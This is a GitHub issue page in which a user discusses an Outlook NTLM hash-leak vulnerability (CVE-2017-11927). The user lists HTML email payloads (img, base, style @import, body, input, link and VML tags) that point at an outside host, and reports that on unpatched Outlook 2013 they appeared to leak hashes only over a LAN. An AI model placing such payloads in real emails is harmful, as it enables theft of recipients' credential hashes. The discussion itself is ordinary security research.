Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Payloads #2

Open
AndzejRovij opened this issue Feb 18, 2019 · 0 comments
Open

Payloads #2

AndzejRovij opened this issue Feb 18, 2019 · 0 comments

Comments

@AndzejRovij
Copy link

You are saying:
According to MSRC, the CVE-2017-11927 [2] (that was not released initially as a result of our report) had rectified some of the payloads. This patch was updated in May 2018 to address the remaining issues that were included in this report.

So I tried with 3 years old unpatched outlook 2013 to use these tags in email:

Image tag:

<img src="//example.com/anon/test.txt" >
Base tag + image tag:

<base href="//example.com/IDontExist/">
<img>
Style tag:

</style>
       @import 'its:/example.com/foo1/test';
       @import url(its:/example.com/foo2/test);
</style>
Body tag (Image):

<body background="its:/example.com/IDontExistNew/foobar">
Input tag (Image):

<input type="image" src="its:/example.com/IDontExistNew/foobar" name="test" value="test">
Link tag (Style):

<link rel="stylesheet" href="its:/example.com/IDontExistNew/foobar" />
VML tag (Image):

<v:background xmlns:v="urn:schemas-microsoft-com:vml">
            <v:fill src="its:/example.com/IDontExistNew/foobar" />
</v:background>

None of them are sending NTLM hashes over public, they just seem to work on LAN only.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant